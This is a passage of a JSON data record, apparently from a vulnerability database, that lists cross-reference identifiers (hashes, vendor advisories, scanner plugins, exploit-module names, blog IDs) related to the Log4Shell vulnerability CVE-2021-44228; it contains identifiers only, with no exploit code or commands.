"8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "8A368F9B7240AEC7A45518B26EE613BFEF287DD9E106138A5AD63F4D494034D6", "8A9E980FE740F4424FB663C857EE84E39154A02964A02540A3A74E4A80F058EE", "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "8B49BD8B4756373645F1A1DA4BC3E31D1FE7BF1F5A0706A9665EE61D5A4B1419", "8C8A687167096A3D2AA73F94AC7D6F1C43EF830C110ED1F9406D92FAD9FCBA59", "8D4EDC587A369AADC2A4B4B6CA60C94602327216807E8B71042463A2BF381325", "8E3EC3A49910FD61ADB4E5FDC225B58A74D0BA57105F3D9A6F1B3E46361C1307", "8E5EB05CFB883D682B3A2C7D645375420476C4616183B915FE43ADDF8FA697A1", "8F6A844E65558AF61A350206417B63BD70D5B529641691C495C07407B13441B7", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "90B290F66451E3E462C09788B6756181F62A92A8BAA10F2C4BD52977FD8E1B37", "90BE58D9524F7F6A98C3EE79C93A2EE6A0EA2C0D7E33DC628128C7D1BCFA8619", "924D425FFD71097B50917C124D87FAE558BFB3C7DAEF1BEA09CE12CCD6B264B3", "92A25ACC7CA97D427DA5F098FEAD958217F50C6C07BA13888E0C08A046DD5DA3", "932EB6FF0C79CFA010373B06A99AA8906C2B3B3171A0D96A0399EF72EC35ED11", "942A563AC62B9ED7ADC9AAA1A75FE9F97DA036B632DE9ECD7DC3CC1E19EC9A60", "94633A31471B22DF4D1E9508BA6DE360B6D37FAD329018F21926F838DAF45AB4", "964A048B00AF3D409A4AA83094E36431FA7631859A2D4595D2F53EE838A705E3", "976356D0F193356D662AC659E8578D3D0CC6C5711EA8A61D28A63CCA919F9900", "980930D95C9061C71E85C435692629E07D952BA870609E55949143F9AA635712", "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "99D36C5A3B6C3FF496422C3FF600B7D254E5D81D1CC0F9184ECD1F8F03423FCD", "9B0F66C4EFFAAF9FDB1B504C2B624740D85D778570BFE202D803740E0C99076C", "9BBA472DF522BDB11A0F80EDDE168630BF88A9C15518FEE66140BBEE5585001A", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9DA9D6C05FE03758B84DC068193CB0E2A82B2F411E24F383722448967D77B355", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "9F34E4D3B1044507E18917B1E2BE1AF6051A228EE5F8F69E5539B48FDFAF3B4D", "A060C0BC5CF92D0F7B8D81075A33D4E2887EE843B41F417A28EC2BBAB72FCED9", "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "A264D72AF012C33CABCDEE09605EBB277263FB33567A89DC0831C44257A7E37C", "A31AAAB46398C4CA9F3552FA53EB3F0DB8FD1384559E2048B5321E5BB6936FB2", "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "A3AEABE024AE1D8520A5BB495A67D45783D1F2AC4B3F9F3B682E75291FD8E20A", "A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "A5803C821BBFCE3CF61C99A5753B13549E824EAC069265D225FFBDF6B568BCDB", "A61564D752A2637A5306DF51328148AB1D1EAAC0735226DD1D9F500C5DAECC37", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "A9139EA8D202B9FE20D64E771F1FC89C7E9393774315A6265F9CE70E716E1833", "A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AAB14D78054A85A0638FC4EFD7F09686429CB02C6B45FF1ECAFA55C27A050635", "AB8881439FA512D752063B5AB323E9C076039DB482070536304B448AE092D8CD", "ABBECC2CF1F809CE932B9130A6788B28E3F6228FC5599EA3FB4CD8372D7EA7C8", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "AE2FA11123F866B1C71B66A57712F1082B82D3EB4221232EC14E14446822A705", "AE98DBCCCCED8FE9C2F0A9A3294999AEF099215A25C0EDDDFD95DF899965A340", "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "AFFC971A929ABC4A5177F4FBA7D32B82C0ACBC71AEFBBD3E440D08B12B022B51", "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "B30C006BF323BCAF8E8EF0489319D47B3A0FB0928442F9EB350A3520109F9F72", "B431011ABF67E8DD4F4E3E4C9F9FD0B1E6E07733191BA7206314070644F2CAF0", "B4779B52313D85FE1157604480F675A0E2BA765BB08DE9BEA2664A6C3AD0F47B", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871"]}, {"type": "mageia", "idList": ["MGASA-2021-0556", "MGASA-2021-0566"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B8C767042833344389F6158273089954"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-44228"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "EULEROS_SA-2022-1276.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOSX_FUSION_VMSA_2022_0004.NASL", "MACOS_SPLUNK_824.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2022-0038-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_ESXI_VMSA-2022-0004.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "VMWARE_WORKSTATION_VMSA_2022_0004.NASL", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022"]}, {"type": "osv", "idList": ["OSV:DLA-2842-1", "OSV:DSA-5020-1", "OSV:DSA-5022-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167917"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "redhat", "idList": ["RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0296", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0AA83DE1427426ABF4723FDF049F6EEB"]}, {"type": "thn", "idList": ["THN:1D10167F5D53B2791D676CF56488D5D9", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:365025B2416483B34C70F02EDA44131E", "THN:368B6517F020AB4BF1B2344EDC8234A4", "THN:4DE731C9D113C3993C96A773C079023F", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:7958F9B1AA180122992C6A0FADB03536", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:933FE23273AB5250B949633A337D44E1", "THN:A6706F6A6D380D968EF32C856D9C796F", 